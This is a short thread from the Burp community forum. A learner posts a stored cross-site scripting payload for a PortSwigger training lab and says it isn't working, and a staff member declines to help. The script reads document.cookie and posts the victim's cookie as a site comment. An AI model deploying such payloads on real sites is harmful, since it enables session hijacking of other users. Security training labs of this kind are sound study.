Burp community forum

Exploiting cross-site scripting to steal cookie

Dai | Last updated: Sep 04, 2019 11:35AM UTC

I'm doing the lab without using Burp Collaborator, so i need to write some custom JavaScript to make a POST request to comment the cookie whenever a user views the comment. My code is as follow: <script> var cookie = document.cookie var changeReq = new XMLHttpRequest(); changeReq.open('post', '/post/comment', true); changeReq.send('csrf=xFqO8r8W2Qip7I1wkiCLgI2WcimCYbwB&postId=1&comment='+cookie+'&name=asdf&email=adsf%40adf&website=http%3A%2F%2Faffaf.com'); </script> But it doesn't seem to work. I'm at a loss at how to test / verify it or how to change it. Could some one please advice? Thanks

Liam, PortSwigger Agent | Last updated: Sep 04, 2019 03:46PM UTC

We don't provide a mentoring service for the labs. This might be something we consider doing in future along with video based solutions. The lab can be completed. Keep trying.

You need to Log in to post a reply. Or register here, for free.